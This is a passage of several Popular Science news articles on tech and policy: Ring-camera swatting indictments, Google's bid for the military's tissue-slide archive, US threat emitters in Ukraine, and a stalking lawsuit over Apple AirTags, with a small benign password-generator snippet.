According to the FTC’s announcement, employees expressed concern internally regarding Epic Games’ lax safeguards for some of its youngest players as far back as 2017. When the company finally got around to introducing a button disabling voice chat, however, the complaint alleges it was made intentionally difficult to locate.

Correction on December 12, 2022: This article has been updated to reflect Epic Games began defaulting to the highest privacy option for players under the age of 18 in September 2022, not as a direct result of the FTC settlement.

Serial ‘swatters’ used Ring cameras to livestream dangerous so-called pranks https://www.popsci.com/technology/ring-camera-swatting-prank-indictment/ Tue, 20 Dec 2022 18:00:00 +0000 https://www.popsci.com/?p=500597
Amazon Ring smart home security camera close-up
The two suspects hacked the Ring accounts of 12 homeowners. Deposit Photos

The indicted allegedly called police to 12 residences, then used Ring cameras to taunt them.

The post Serial ‘swatters’ used Ring cameras to livestream dangerous so-called pranks appeared first on Popular Science.



A California grand jury indicted two men late last week for orchestrating a “swatting spree” after illegally accessing a dozen Ring home security systems across the country. In November 2020, Kya Christian Nelson, 21, of Wisconsin, and James Thomas Andrew McCarty, 20, of North Carolina, obtained private credentials for a number of Yahoo email addresses, which the pair then tested to see if the information corresponded with Ring subscription logins.

The indictment implies the men then gleaned personal information such as addresses from 12 Ring accounts, and either placed false emergency reports or called local police to those locations, citing fake disturbances. Law enforcement was then dispatched to the unwitting Ring owners’ residences. This dangerous, occasionally lethal prank is known as “swatting.” Beyond the attacks’ logistical and legal consequences, the events can inflict lasting psychological trauma on victims, and have long been a favored form of hate-crime harassment.

[Related: Ring camera surveillance puts new pressure on Amazon gig workers.]

As Ars Technica noted on Monday, it still remains unknown how the two men gained the login information. Regardless, Nelson and McCarty then live streamed the ensuing chaos via social media. In one instance cited within the US Attorney’s Office for the Central District of California’s announcement, the pair phoned a police department and posed as a child who claimed their parents were arguing and firing guns in the house following a drunken dispute. Once police arrived at the home, Nelson and McCarty utilized the compromised Ring system’s doorbell speakers to verbally abuse and taunt the responding officers.

The weeklong swatting campaign gained the attention of national news outlets, prompting the FBI to issue a public service announcement urging owners of Ring and other similar smart home security systems to take additional safety measures. Simple habits such as enabling two-factor authentication and choosing complex, unique passwords alongside a password manager have consistently been shown to help deter bad actors attempting to compromise online accounts.
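The “complex, unique password” half of that advice is easy to automate. As a purely illustrative sketch (not tied to Ring or any product mentioned here), Python’s standard `secrets` module can generate a fresh, random password for each account, to be stored in a password manager rather than reused:

```python
import secrets
import string

def generate_password(length: int = 20) -> str:
    """Generate a random password drawn from letters, digits, and punctuation."""
    alphabet = string.ascii_letters + string.digits + string.punctuation
    return "".join(secrets.choice(alphabet) for _ in range(length))

# Generate one unique password per account; never reuse them across sites.
print(generate_password())
```

Using `secrets` rather than `random` matters here: `secrets` draws from the operating system’s cryptographically secure randomness source, which is what you want for credentials.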

[Related: Amazon’s Ring Nation quietly premieres on cable TV in 35 states.]

If convicted, Nelson and McCarty could face multiple years in federal prison. Ars Technica also reports that a separate indictment was filed against McCarty in November in Arizona for swatting attacks on at least 18 people.

Ring, which was purchased by Amazon in 2018, has faced consistent criticism for its internal security problems. The issues coincide with advocacy groups’ concerns over what they call the company’s fear-mongering marketing tactics, its under-the-radar data sharing with law enforcement, and, most recently, a family-friendly reality show, dubbed Ring Nation, culled in part from Ring home videos. A coalition of concerned organizations recently reiterated their call to cancel the series following the conclusion of its first season.

Inside Google’s quest to digitize troops’ tissue samples https://www.popsci.com/technology/google-military-tissue-samples/ Wed, 14 Dec 2022 02:00:00 +0000 https://www.popsci.com/?p=498374
Military photo
imageBROKER/Sigrid Gombert/Getty

DOD staffers have pushed back on Google's mission for exclusive access to veterans’ skin samples, tumor biopsies, and slices of organs.

The post Inside Google’s quest to digitize troops’ tissue samples appeared first on Popular Science.


This article was originally featured on ProPublica.

ProPublica is a Pulitzer Prize-winning investigative newsroom.

In early February 2016, the security gate at a U.S. military base near Washington, D.C., swung open to admit a Navy doctor accompanying a pair of surprising visitors: two artificial intelligence scientists from Google.

In a cavernous, temperature-controlled warehouse at the Joint Pathology Center, they stood amid stacks holding the crown jewels of the center’s collection: tens of millions of pathology slides containing slivers of skin, tumor biopsies and slices of organs from armed service members and veterans.

Standing with their Navy sponsor behind them, the Google scientists posed for a photograph, beaming.

Mostly unknown to the public, the trove and the staff who study it have long been regarded in pathology circles as vital national resources: Scientists used a dead soldier’s specimen archived here to perform the first genetic sequencing of the 1918 influenza virus.

Google had a confidential plan to turn the collection of slides into an immense archive that — with the help of the company’s burgeoning, and potentially profitable, AI business — could help create tools to aid the diagnosis and treatment of cancer and other diseases. And it would seek first, exclusive dibs to do so.

“The chief concern,” Google’s liaison in the military warned the leaders of the repository, “is keeping this out of the press.”

More than six years later, Google is still laboring to turn this vast collection of human specimens into digital gold.

At least a dozen Defense Department staff members have raised ethical or legal concerns about Google’s quest for service members’ medical data and about the behavior of its military supporters, records reviewed by ProPublica show. Underlying their complaints are concerns about privacy, favoritism and the private use of a sensitive government resource in a time when AI in health care shows both great promise and risk. And some of them worried that Google was upending the center’s own pilot project to digitize its collection for future AI use.

Pathology experts familiar with the collection say the center’s leaders have good reason to be cautious about partnerships with AI companies. “Well designed, correctly validated and ethically implemented [health algorithms] could be game-changing things,” said Dr. Monica E. de Baca, chair of the College of American Pathologists’ Council on Informatics and Pathology Innovation. “But until we figure out how to do that well, I’m worried that — knowingly or unknowingly — there will be an awful lot of snake oil sold.”

When it wasn’t chosen to take part in JPC’s pilot project, Google pulled levers in the upper reaches of the Pentagon and in Congress. This year, after lobbying by Google, staff on the House Armed Services Committee quietly inserted language into a report accompanying the Defense Authorization Act that raises doubts about the pathology center’s modernization efforts while providing a path for the tech giant to land future AI work with the center.

Pathology experts call the JPC collection a national treasure, unique in its age, size and breadth. The archive holds more than 31 million blocks of human tissue and 55 million slides. More recent specimens are linked with detailed patient information, including pathologist annotations and case histories. And the repository holds many examples of “edge cases” — diseases so vanishingly rare that many pathologists never see them.

Google sought to gather so many identifying details about the specimens and patients that the repository’s leaders feared it would compromise patients’ anonymity. Discussions became so contentious in 2017 that the leaders of the JPC broke them off.

In an interview with ProPublica, retired Col. Clayton Simon, the former director of the JPC, said Google wanted more than the pathology center felt it could provide. “Ultimately, even through negotiations, we were unable to find a pathway that we legally could do and ethically should do,” Simon said. “And the partnership dissolved.”

But Google didn’t give up. Last year, the center’s current director, Col. Joel Moncur, in response to questions from DOD lawyers, warned that the actions of Google’s chief research partner in the military “could cause a breach of patient privacy and could lead to a scandal that adversely affects the military.”

Google has told the military that the JPC collection holds the “raw materials” for the most significant biotechnology breakthroughs of this decade — “on par with the Human Genome Project in its potential for strategic, clinical, and economic impact.”

All of that made the cache an alluring target for any company hoping to develop health care algorithms. Enormous quantities of medical data are needed to design algorithmic models that can identify patterns a pathologist might miss — and Google and other companies are in a race to gather them. Only a handful of tech companies have the scale to scan, store and analyze a collection of this magnitude on their own. Companies that have submitted plans to compete for aspects of the center’s modernization project include Amazon Web Services, Cerner Corp. and a host of small AI companies.

But no company has been as aggressive as Google, whose parent company, Alphabet, has previously drawn fire for its efforts to gather and crunch medical data. In the United Kingdom, regulators reprimanded a hospital in 2017 for providing data on more than 1.6 million patients, without their understanding, to Alphabet’s AI unit, DeepMind. In 2019, The Wall Street Journal reported that Google had a secret deal, dubbed “Project Nightingale,” with a Catholic health care system that gave it access to data on millions of patients in 21 states, also without the knowledge of patients or doctors. Google responded to the Journal story in a blog post that stated that patient data “cannot and will not be combined with any Google consumer data.”

In a statement, Ted Ladd, a Google spokesperson, attributed the ethics complaints associated with its efforts to work with the repository to an “inter-agency issue” and a “personnel dispute.”

“We had hoped to enable the JPC to digitize its data and, with its permission, develop computer models that would enable researchers and clinicians to improve diagnosis for cancers and other illnesses,” Ladd said, noting that all of Google’s health care partnerships involve “the strictest controls” over data. “Our customers own and manage their data, and we cannot — and do not — use it for any purpose other than explicitly agreed upon by the customer,” Ladd said.

In response to questions from ProPublica, the JPC said none of its de-identified data would be shared during its modernization process unless it met the ethical, regulatory, and legal approvals needed to ensure it was done in the right way.

“The highest priority of the JPC’s digital transformation is to ensure that any de-identified digital slides are used ethically and in a manner that protects patient privacy and military security,” the JPC said.

But some fear that even these safeguards might not be enough. Steven French, a DOD cloud computing engineer assigned to the project, said he was dismayed by the relentlessness of Google’s advocates in the department. Lost in all their discussions about the speed, scale and cost-saving benefits associated with working with Google seemed to be concerns for the interests of the service members whose tissue was the subject of all this maneuvering, French told ProPublica.

“It felt really bad to me,” French said. “Like a slow crush towards the inevitability of some big tech company monetizing it.”

The JPC certainly does need help from tech companies. Underfunded by Congress and long neglected by the Pentagon, it is vulnerable to offers from well-funded rescuers. In spite of its leaders’ pleas, funding for a full-scale modernization project has never materialized. The pathology center’s aging warehouses have been afflicted with water leaks and unwelcome intruders: a marauding family of raccoons.

The story of the pathology center’s long, contentious battle with Google has never been told before. ProPublica’s account is based on internal emails, presentations and memos, as well as interviews with current and former DOD officials, some of whom asked not to be identified because they were not authorized to discuss the matter or for fear of retribution.

Google’s Private Tour

In December 2015, Google began its courtship of the JPC with a bold, unsolicited proposal. The messenger was a junior naval officer, Lt. Cmdr. Niels Olson.

“I’m working with Google on a project to apply machine learning to medical imaging,” Olson wrote to the leaders of the repository. “And it seems like we are at the stage where we need to figure exactly what JPC has.”

A United States Naval Academy physics major and Tulane medical school graduate, Olson worked as a clinical and anatomical pathology resident at the Naval Medical Center in San Diego.

With digitized specimen slides holding massive amounts of data, pathology seemed ripe for the coming AI revolution in medicine, he believed. Olson’s own urgency was heightened in 2014 when his father was diagnosed with prostate cancer.

That year, Olson teamed up with scientists at Google to train software to recognize suspected cancer cells. Google supplied expertise including AI scientists and high-speed, high-resolution scanners. The endeavor had cleared all privacy and review board hurdles. They were scanning Navy patients’ pathology slides at a furious clip, but they needed a larger data set to validate their findings.

Enter the JPC’s archive. Olson learned about the center in medical school. In his email to its leaders in December 2015, Olson attached Google’s eight-page proposal.

Google offered to start the operation by training algorithms with already digitized data in the repository. And it would do this early work “with no exchange of funds.” These types of partnerships free the private parties from having to undergo a competitive bidding process.

Google promised to do the work in a manner that balanced “privacy and ethical considerations.” The government, under the proposal, would own and control the slides and data.

Olson typed a warning: “This is under a non-disclosure agreement with Google, so I need to ask you, do please handle this information appropriately. The chief concern is keeping this out of the press.”

Senior military and civilian staff at the pathology center reacted with alarm. Dr. Francisco Rentas, the head of the archive’s tissue operations, pushed back against the notion of sharing the data with Google.

“As you know, we have the largest pathology repository in the world and a lot of entities will love to get their hands on it, including Google competitors. How do we overcome that?” Rentas asked in an email.

Other leaders had similar reactions. “My concerns are raised when I’m advised to not disclose what seems to be a contractual relationship to the press,” one of the top managers at the pathology center, Col. Edward Stevens, told Olson. Stevens told Olson that giving Google access to this information without a competitive bid could result in litigation from the company’s competitors. Stevens asked: “Does this need to go through an open-source bid?”

But even with these concerns, Simon, the pathology center’s director, was intrigued enough to continue discussions. He invited Olson and Google to inspect the facility.

The warehouse Olson and the Google scientists entered could have served as a set for the final scene of “Raiders of the Lost Ark.”

Pathology slides were stacked in canyon-like aisles, some towering two stories high. The slides were arranged in metal trays and cardboard boxes. To access tissue samples, the repository used a retrieval system similar to those found in dry cleaners. The pathology center had just a handful of working scanners. At the pace they were going, it would take centuries to digitize the entire collection.

One person familiar with the repository likened it to the Library of Alexandria, which held the largest archive of knowledge in the ancient world. Myth held that the library was destroyed in a cataclysmic fire lit by Roman invaders, but historians believe the real killer was gradual decay and neglect over centuries.

The military’s tissue library had already played an important role in the advancement of medical knowledge. Its birth in 1862 as the Army Medical Museum was grisly. In a blandly written order in the midst of the Civil War, the Army surgeon general instructed surgeons “diligently to collect and preserve” all specimens of “morbid anatomy, surgical or medical, which may be regarded as valuable.”

Soon the museum’s curator was digging through battlefield trenches to find “many a putrid heap” of hands, feet and other body parts ravaged by disease and war. He and other doctors shipped the remains to Washington in whiskey-filled casks.

Over the next 160 years, the tissue collection outgrew several headquarters, including Washington’s Ford Theater and a nuclear-bomb-proof building near the White House. But the main mission — identifying, studying and reducing the calamitous impact of illnesses and injuries afflicting service members — has remained unchanged in times of war and peace. Each time a military or veterans’ hospital pathologist sent a tissue sample to the pathology center for a second opinion, it was filed away in the repository.

As the archive expanded, the repository’s prestige grew. Its scientists spurred advances in microscopy, cancer and tropical disease research. An institute pathologist named Walter Reed proved that mosquitoes transmit yellow fever, an important discovery in the history of medicine.

For much of its modern history, in addition to serving military and veterans hospitals, the center also provided civilian consultations. The work with elite teaching hospitals gave the center a luster that helped it attract and retain top pathologists.

Congress and DOD leaders questioned why the military should fund civilian work that could be done elsewhere. In 2005, under the congressionally mandated base closure act, the Pentagon ordered the organization running the repository to shut down. The organization reopened with a different overseer, tasked with a narrower, military-focused mission. Uncertainty about the organization’s future caused many top pathologists to leave.

In its first pitch to the repository’s leaders, Google pointedly mentioned a book-length Institute of Medicine report on the repository that stated that “wide access” to the archive’s materials would promote the “public good.” The biorepository wasn’t living up to its potential, Google said, noting that “no major efforts have been underway to fix the problem.”

Following the tour, a Google scientist prepared a list of clinical, demographic and patient information it sought from the repository. The list included “must haves” — case diagnoses; pathology and radiology images; information on gender and ethnicity; and birth and death dates — as well as “high-value” patient information, including comorbidities, subsequent hospitalizations and cause of death.

This troubled the JPC’s director. “We felt very, very concerned about giving too much data to them,” Simon told ProPublica, “because too much data could identify the patient.”

There were other aspects about Google’s offer that made it “very unfavorable to the federal government,” Simon later told his successor, according to an email reviewed by ProPublica.

In exchange for scanning and digitizing the slide collection at its own expense, Google sought “exclusive access” to the data for at least four years.

The other deal-breaker was Google’s requirement that it be able to charge the government to store and access the digitized information, a huge financial commitment. Simon did not have the authority to commit the government to future payments to a company without authorization from Congress.

Today, Ladd, the Google spokesperson, disputes the claim that its proposal would have been unfavorable to the government. “Our goal was to help the government digitize the data before it physically deteriorates.”

Ladd said Google sought exclusive access to the data during the early stages of the project, so that it could scan the de-identified samples and perform quality-control measures on the data prior to handing it back to the JPC.

Niels Olson, who spearheaded the project for the Navy in 2016, declined requests for interviews with ProPublica. But Jackson Stephens, a friend and lawyer who is representing Olson, said Olson had always followed the Institutional Review Board process and worked to anonymize patient medical data before it was used in research or shared with a third party.

“Niels takes his oath to the Constitution and his Hippocratic oath very seriously,” Stephens said. “He loves science, but his first duty of care is to his patients.”

Google’s relentlessness in 2017, too, spooked the repository’s leaders, according to an email reviewed by ProPublica. Google’s lawyer put “pressure” on the head of tissue operations to sign the agreement, which he declined to do. Leaders of the center became “uncomfortable” and discontinued discussions, according to the DOD email.

Though he banged on doors in the Pentagon and Congress, Simon was not able to convince the Obama administration to include the JPC in then-Vice President Joe Biden’s Cancer Moonshot. Simon left the JPC in 2018, his hopes for a modernization of the library dashed. But then a Pentagon advisory board got wind of the JPC collection, and everything changed.

“The Smartest People on Earth”

In March of 2020, the Defense Innovation Board announced a series of recommendations to digitize the JPC collection. The board called for a pilot project to scan a large initial batch of slides — at least 1 million in the first year — as a prelude to the massive undertaking of digitizing all 55 million slides.

“My worldview was that this should be one of the highest priorities of the Defense Department,” William Bushman, then acting deputy undersecretary of personnel and readiness, told ProPublica. “It has the potential to save more lives than anything else being done in the department.”

As the pathology center prepared to launch its pilot, the staff talked about a scandal that occurred just 40 miles north.

Henrietta Lacks was a Black woman who died of cancer in 1951 while being treated at Baltimore’s Johns Hopkins Hospital. Without her or her family’s knowledge or consent, and without compensation, her cells were replicated and commercialized, leading to groundbreaking advances in medicine but also federal reforms on the use of patient cells for research.

Like Lacks’ cancer cells, every specimen in the archive, the JPC team knew, represented its own story of human mortality and vulnerability. The tissue came from veterans and current service members willing to put their lives on the line for their country. Most of the samples came from patients whose doctors discovered ominous signs from biopsies and then sent the specimens to the center for second opinions. Few signed consent forms agreeing to have their samples used in medical research.

The pathology center hired two experts in AI ethics to develop ethical, legal and regulatory guidelines. Meanwhile, the pressure to cooperate with Google hadn’t gone away.

In the summer of 2020, as COVID-19 surged across the country, Olson was stationed at a naval lab in Guam, working on an AI project to detect the coronavirus. That project was managed by a military group based out of Silicon Valley known as the Defense Innovation Unit, a separate effort to speed the military’s development and adoption of cutting-edge technology. Though the group worked with many tech companies, it had gained a reputation for being cozy with Google. The DIU’s headquarters in Mountain View, California, sat just across the street from the Googleplex, the tech giant’s headquarters. Olson joined the group officially that August.

Olson’s COVID-19 work earned him Navy Times’ coveted Sailor of the Year award as well as the attention of a man who would become a powerful ally in the DOD, Thomas “Pat” Flanders.

Flanders was the chief information officer of the sprawling Defense Health Agency, which oversaw the military’s medical services, including hospitals and clinics. A garrulous Army veteran, Flanders questioned the wisdom of running the pilot project without first getting funding to scan all of the 55 million slides. He wanted the pathology staff to hear about the work Olson and Google had done scanning pathology slides in San Diego and see if a similar public-private partnership could be forged with the JPC.

Over the objections of Moncur, the JPC’s director, Flanders insisted on having Olson attend all the pathology center’s meetings to discuss the pilot, according to internal emails.

In August 2020, the JPC published a request for information from vendors interested in taking part in the pilot project. The terms of that request specified that no feedback would be given to companies about their submissions and that telephone inquiries would not be accepted or acknowledged. Such conversations could be seen as favoritism and could lead to a protest by competitors who did not get this privilege.

But Flanders insisted that meeting Google was appropriate, according to Moncur’s statements to DOD lawyers.

In a video conference call, Flanders told the Google representatives they were “the smartest people on earth” and said he couldn’t believe he was “getting to meet them for free,” according to written accounts of the meeting provided to DOD lawyers.

Flanders asked Google to explain its business model, saying he wanted to see how both the government and company might profit from the center’s data so that he could influence the requirements on the government side — a remark that left even the Google representatives “speechless,” according to a compilation of concerns raised by DOD staffers.

To Moncur and others in attendance, Flanders was actively negotiating with Google, according to Moncur’s statement to DOD lawyers.

To the astonishment of the center staff, Flanders asked for a second meeting between Google and the JPC team.

Concern about Flanders’ conduct echoed in other parts of the DOD. A lawyer for Defense Digital Service, a team of software engineers, data scientists and product managers assigned to assist on the project, wrote that Flanders ignored legal warnings. He described Flanders as a “cowboy” who in spite of warnings about his behavior was not likely “to fall out of love with Google.”

In an interview with ProPublica, Flanders disputed claims that he was biased toward Google. Flanders said his focus has always been on scanning and storing the slides as quickly and economically as possible. As for his lavish praise of Google, Flanders said he was merely trying to be “kind” to the company’s representatives.

“People took offense to that,” Flanders said. “It’s just really pettiness on the part of people who couldn’t get along, honestly.”

A spokesperson for the Defense Health Agency said it was “totally appropriate” for Flanders to ask Google about its business model. “This is part of market research,” the spokesperson wrote, adding that no negotiation occurred at the meeting and that all government stakeholders had been invited to attend.

Moncur referred calls to a JPC spokesperson. A spokesperson for the JPC said in a statement that “Moncur was concerned about meeting with vendors during the RFI period.”

“An Arm of Google”

In late 2020, the modernization team received more troubling news. In a slide presentation for the JPC describing other AI work with Google and the military, Olson disclosed that the company had “made offers of employment, which I have declined.” But then he suggested the offer might be revived in the future, writing, “we mutually agreed to table the matter.” He said he had “no other conflicts of interest to declare.” Google told ProPublica it had never directly made Olson a job offer, though a temp agency it used did.

More facts surfaced. Olson also had a Google corporate email address. And he had access to Google corporate files, according to internal communications from concerned DOD staff members. Google said it is common for its research partners in the government to have these privileges.

“I am more worried than ever that DIU’s influence will destroy this acquisition,” a DOD lawyer wrote, referring to efforts to find vendors for the pilot project. He called DIU “essentially an arm of Google.”

At the time, a DIU lawyer defended Olson. The lawyer said Olson had “no further conflict of interest issues” and had done nothing improper because the job offer had been made three years earlier, in 2017. An ethics officer at the DOD Standards of Conduct Office agreed.

Today, a spokesperson in the Office of the Secretary of Defense told ProPublica the department was committed to modernizing the repository “while carefully observing all applicable legal and ethical rules.”

Olson’s friend and lawyer, Stephens, said Olson had been upfront, disclosing the job offer to the innovation unit’s lawyer as well as in the conflict-of-interest section of his slide presentation. He said Olson had declined the offer, which was withdrawn. “He’s not some kind of Google secret agent.”

Stephens said the JPC would have been much further down the road had it cooperated with Olson. Stephens said it became apparent to Olson that Moncur was “essentially ignoring” a “gold mine that could help a lot of people.”

“Niels is the tenacious doctor who is just trying to do the science and build a coalition of partners to get this thing done,” Stephens said. “I think he’s the hero of this story.”

Google Turns to Congress

In 2021, the pathology center selected one of the most prestigious medical institutions in the world, Johns Hopkins — which plans to erect a building honoring Henrietta Lacks — to assist it in scanning slides. It picked two small technology companies to start building tools to let pathologists search the archive.

Google wanted to be selected, and in a confidential proposal, it offered to help the repository build up its own slide-scanning capabilities.

When Google was not selected for the pilot project, the company went above the JPC leaders’ heads. Google claimed in a letter to Pentagon leaders that the company had been unfairly excluded from “full and open competition.” In that August 2021 letter, Google argued that the nation’s security was at stake. It asked the DOD to “consider allowing Google Cloud” and other providers to compete to ensure the “nation’s ability to compete with China in biotechnology.”

Time was of the essence, Google warned. “The physical slides at the JPC are degrading rapidly each day. … Without further action, the slides will continue to degrade and some may ultimately be damaged beyond repair.”

Google stepped up its advocacy campaign. The company deployed a lobbying firm, the Roosevelt Group — which boasts of its ability to “leverage” its connections to secure federal business opportunities to its clients — to raise doubts about the JPC’s pilot project. Their efforts worked. In little-noticed language in a report written to accompany the 2023 Defense Authorization Act, the House Armed Services Committee expressed its concern about the speed of the scanning process and the choice of technology, which the committee claimed would not allow the “swift digitization of these deteriorating slides.”

The committee had its own ideas of how the pathology center’s work should be carried out, suggesting that the center work in tandem with the DIU, using an augmented reality microscope whose software was engineered by Google.

In a statement, the Roosevelt Group told ProPublica it was “proud” of its work for Google. The firm said it helped the company “educate professional staff of the House and Senate Armed Services Committees over concerns about the lack of an open procurement process for digitization of slides.” The group chided DOD officials for being “unwilling to provide answers to Congress around the lack of progress on the JPC digitization effort.”

The pathology center staff was dismayed by the committee’s recommendations that it work with Olson’s group.

In a video conference meeting late last summer with Armed Services Committee staff, the leaders of the pathology center attempted to rebut the House committee report. The JPC’s work was going as planned, they said, noting that a million slides had been scanned. And the pathology center was collaborating with the National Institutes of Health to develop AI tools to help predict prognoses for cancer treatments.

The House Armed Services Committee ordered Pentagon leaders to “conduct a comprehensive assessment” on the digitization effort and to provide a briefing to the committee on its findings by April 1, 2023.

In a statement in response to ProPublica’s questions about the bill, Ladd, the Google spokesperson, acknowledged the company’s influence efforts on Capitol Hill. “We frequently provide information to congressional staff on issues of national importance,” Ladd said. The statement confirmed that the company suggested “language be inserted” into the 2023 Defense Authorization Act calling for a “comprehensive assessment” of the digitization effort.

“Despite efforts from Google and many at the Department of Defense, our work with JPC unfortunately never got off the ground, and the physical repository of pathology slides continues to deteriorate,” Ladd said. “We remain optimistic that if the repository could be properly digitized, it would save many American lives, including those of our service members.”

On this last point, even Google’s critics are in accord. A properly funded project would cost taxpayers a few hundred million dollars — a minuscule portion of the $858 billion defense budget and a small price if the lifesaving potential of the collection is realized.

Last year, as tensions grew with Google, the modernization team at the repository launched a publicity campaign to call attention to the project and the high ethical stakes.

An entire panel discussion was devoted to the JPC effort at the 2021 South by Southwest conference. “This is a once in a lifetime opportunity, and I want to make sure we do it right, we do it responsibly and we do it ethically,” said Steven French, the DOD cloud computing engineer assigned to assist the repository.

Then without mentioning Google’s name, he added a Shakespearean barb. “There’s plenty of vendors, plenty of companies, plenty of people,” French said, “who are more than willing to do this and extract a pound of flesh from us in the process.”

The post Inside Google’s quest to digitize troops’ tissue samples appeared first on Popular Science.

Articles may contain affiliate links which enable us to share in the revenue of any purchases made.

Ukraine could use ‘threat emitters’ to trick Russian pilots https://www.popsci.com/technology/ukraine-us-threat-emitters/ Wed, 07 Dec 2022 20:07:01 +0000 https://www.popsci.com/?p=496036
This Joint Threat Emitter is seen in Japan in 2021.
This Joint Threat Emitter is seen in Japan in 2021. US Air Force / Leon Redfern

Here's what threat emitters do, and how this training tool could be used in a real war.

The post Ukraine could use ‘threat emitters’ to trick Russian pilots appeared first on Popular Science.


To confuse Russian aircraft, Ukraine reportedly has access to a training tool from the United States known as “threat emitters.” These devices teach pilots the signatures of hostile aircraft and missiles, allowing them to safely practice identifying and reacting to combat situations in training. In simulated scenarios, pilots learn how their sensors would perceive real threats, and can safely plan and adapt to the various anti-aircraft weapons they might encounter. The net effect is that pilots learn to fight against a phantom representation of air defenses, in preparation for the real thing.

But when brought to actual war, the emitters in turn are a way to make an enemy’s sensors less reliable, confounding adversarial pilots about what is real and what is merely an electromagnetic mirage.

These “low-cost emitters were built for ranges inside the U.S. but now are in the hands of Ukrainians,” reported Aviation Week, citing Air Force Chief of Staff Charles Q. Brown Jr. “The emitters can replicate surface-to-air missiles and aircraft, and are a cheap, innovative way to further complicate the air picture for Russia.”

One such system is the Joint Threat Emitter. There are two major components to the system: a command unit that lets soldiers operate it, and trailer-mounted radar threat emitters. A command unit can control up to 12 different threat emitters, and each emitter can simulate up to six threats at once. 
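Those capacity figures imply a simple upper bound on how many simulated threats a single command unit can present at once. A back-of-the-envelope sketch (Python, purely illustrative):

```python
# Capacity figures from the article: one command unit controls up to
# 12 threat emitters, and each emitter can simulate up to 6 threats.
emitters_per_command_unit = 12
threats_per_emitter = 6

# Upper bound on simultaneous simulated threats per command unit.
max_simultaneous_threats = emitters_per_command_unit * threats_per_emitter
print(max_simultaneous_threats)  # 72
```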

These emitters help pilots train on their sensors, practicing for war when far from conflict. In 2013, the Air Force and Navy set up Joint Threat Emitters at Andersen Air Force Base on Guam. Both the Navy and Air Force operate from the island, and as the American territory closest to North Korea and China, Guam is prominently featured in war plans involving either country.

“When [pilots] go to a real-world situation, they won’t see anything that we haven’t thrown at them before,” Staff Sgt. Rick Woltkamp, a ground radar systems craftsman with the Idaho Air National Guard, said in 2013. “We simulate a ground attack, and the pilot will react and respond accordingly to the simulation.”

[Related: The Air Force wants to start using its ‘Angry Kitten’ system in combat]

Development and use of the tech go back two decades. In 2002, the Air Force selected Northrop Grumman to develop the Joint Threat Emitter over the next 10 years as a “high-fidelity, full-power threat simulator that is capable of generating radar signals associated with threat systems” that will “better enable aircrews to train in modern war environments.”

Some of the signals it can generate mimic surface-to-air missiles and anti-aircraft artillery, both of which threaten planes but require different countermeasures. One example of a non-missile air defense system is the ZSU-23, built by the Soviet Union. The ZSU is an armored vehicle with anti-aircraft guns mounted on a turret and a radar dish to guide its targeting. As a Soviet-made system, ZSU-23s were handed down to successor states, and are reportedly in operation by the militaries of both Ukraine and Russia.

When used for training purposes, the Joint Threat Emitters let pilots perceive and adapt to the presence of enemies, beyond visual line of sight. At these distances, pilots rely largely on sensor readings to see and anticipate the danger they are flying into. One way for them to adapt might be to pick a new route, further from the anti-air radars. Another would be to divert the attack to knock out anti-air systems first.

[Related: How electronic warfare could factor into the Russia-Ukraine crisis]

In Ukraine, the likely use case for these emitters is to augment the country’s existing air defenses. Using the emitters to project air-defense signals across the battlefield—signals identical to known and real Ukrainian air defenses—could mask where the actual defenses are. Real defenses lurking in a sea of mirage defenses, simulated but not backed up by the actual weapons, is a vexing proposition for an attacker. Discovering what is real means probing the defenses with scouts (or hoping that satellite imagery provides a timely update). But because the emitters, like the weapons they emulate, can be driven around, even a view from space cannot accurately pin down a fixed location for long.

Russia’s air force has struggled to achieve air superiority over Ukraine since it invaded in February 2022. Existing air defenses, from vintage human-portable missiles to newer arrivals, put planes and helicopters at real risk of attack. Videos of Russian helicopters lobbing rockets, a tactic that extends range while greatly reducing accuracy, suggest that even in the war’s earliest months Russian pilots were wary of Ukrainian anti-air defenses.

While the threat emitters alone do not offer any direct way to shoot down aircraft, having them in place makes Russia’s work of attacking from the sky that much harder. Even if a threat emitter is found and destroyed, it likely means that Russia spent ammunition hitting a decoy target, while missing a real and tangible threat.

Apple sued by stalking victims over alleged AirTag tracking https://www.popsci.com/technology/lawsuit-apple-airtags-stalking/ Wed, 07 Dec 2022 17:15:00 +0000 https://www.popsci.com/?p=495908
Hundreds of stalking incidents have involved AirTags since their debut last year.
Hundreds of stalking incidents have involved AirTags since their debut last year. Jonas Elia on Unsplash

The lawsuit argues that Apple has enabled abuse, stalking, and physical violence against victims.

The post Apple sued by stalking victims over alleged AirTag tracking appeared first on Popular Science.


Yesterday, two women filed a proposed class action lawsuit against Apple, alleging that the company has ignored repeated warnings from critics and security experts that its AirTag devices are being used to stalk and harass people. Both plaintiffs were targets of past abuse from ex-partners, and argue in the filing that Apple’s subsequent safeguards remain wholly inadequate for consumers.

“With a price point of just $29, it has become the weapon of choice of stalkers and abusers,” reads a portion of the lawsuit, as The New York Times reported yesterday.

Apple debuted AirTags in April 2021. Within the ensuing eight months, at least 150 police reports from just eight precincts reviewed by Motherboard explicitly mentioned abusers using the tracking devices to stalk and harass women. In the new lawsuit, the plaintiffs allege that one woman’s abuser hid an AirTag in her car’s wheel well, while the other woman’s abuser placed one in their child’s backpack following a contentious divorce, according to the suit. Security experts have since cautioned that hundreds of similar situations likely remain unreported or even undetected.

[Related: Apple AirTag: 8 common questions answered.]

At roughly the size of a quarter or large coat button, AirTags are marketed as a cheap, accurate tool to keep track of items such as individuals’ keys, wallets, purses, and other small everyday items. The lawsuit, published by Ars Technica, cites them as “one of the products that has revolutionized the scope, breadth, and ease of location-based stalking,” arguing that “what separates the AirTag from any competitor product is its unparalleled accuracy, ease of use (it fits seamlessly into Apple’s existing suite of products), and affordability.”

AirTags rely on Bluetooth signals within Apple’s “Find My” network and thus can show owners their device’s approximate location. Despite Apple’s initial claims that AirTags were “stalker-proof,” the company issued a statement in February 2022 relaying that it had “seen reports of bad actors attempting to misuse AirTag for malicious or criminal purposes,” and was subsequently working with “various safety groups and law enforcement organizations” to address the abuse.

[Related: Colorado police sued over SWAT raid based on ‘Find My’ app screenshot.]

Critics and the lawsuit argue that a subsequent series of minor updates—such as text alerts when AirTags are detected nearby and the introduction of a 60-decibel location chime—fails to address the vast majority of victims’ concerns. The complaint also notes that additional updates Apple promised by the end of the year have yet to materialize.

None of the stopgaps are particularly helpful for Android users, either, who must download Apple’s Tracker Detect app and manually search for AirTags nearby. The lawsuit reminds readers that this is “something a person being unknowingly tracked would be unlikely to do.”

